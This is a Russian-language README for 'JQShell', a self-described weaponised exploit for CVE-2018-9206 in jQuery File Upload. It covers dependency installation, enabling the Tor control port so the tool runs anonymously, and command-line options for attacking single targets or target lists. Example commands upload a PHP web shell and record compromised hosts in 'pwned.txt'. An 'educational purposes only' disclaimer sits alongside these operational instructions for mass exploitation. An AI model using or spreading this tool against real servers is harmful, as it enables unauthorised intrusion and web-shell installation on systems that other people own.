
Автоматизированный эксплойт для CVE-2018-9206 (jQuery File Upload) с возможностью сканирования одной/нескольких целей, поддержкой прокси Tor и ведением журнала вывода для тестирования на проникновение и образовательных целей.

JQShell
Вооружённая версия CVE-2018-9206.
Отказ от ответственности
Использование этого инструмента против серверов, которыми вы не управляете, незаконно в большинстве стран. Автор не несёт ответственности за действия тех, кто использует это ПО в незаконных целях. Данное ПО предназначено только для образовательных целей. При создании этого ПО ни один сервер не был незаконно взломан.
Возможности
Одиночная цель Множество целей Tor
Предварительные требования
Пожалуйста, установите необходимые пакеты.
Python3
pip3 install requests pysocks subprocess stem
Управляющий порт Tor
Для использования Tor в этом скрипте необходимо отредактировать файл torrc и включить управляющий порт на 9051.
Обычно этот файл находится здесь: /etc/tor/torrc
Откройте этот файл и измените строку:
#ControlPort 9051
на
ControlPort 9051
перезапустите службу tor
Использование
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
[-o OUTPUTZ] [-tor]
optional arguments:
-h, --help show this help message and exit
-l LIST_INIT, --list LIST_INIT
Select for a list of assets to exploit
-t SINGLE_TARGET, --target SINGLE_TARGET
Single exploit target
-s SHELL_LOC, --shell SHELL_LOC
This is required, put the fullpath to your shell
-o OUTPUTZ, --output OUTPUTZ
This is full path to were you want to save your list
of confirmed hosts
-tor, --tor_proxy Select if you have tor installed, you will need to
enable control port
Примеры
Запуск против одной цели.
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
Запуск против одной цели с сохранением результатов.
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
Запуск списка целей с сохранением результатов.
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
Автор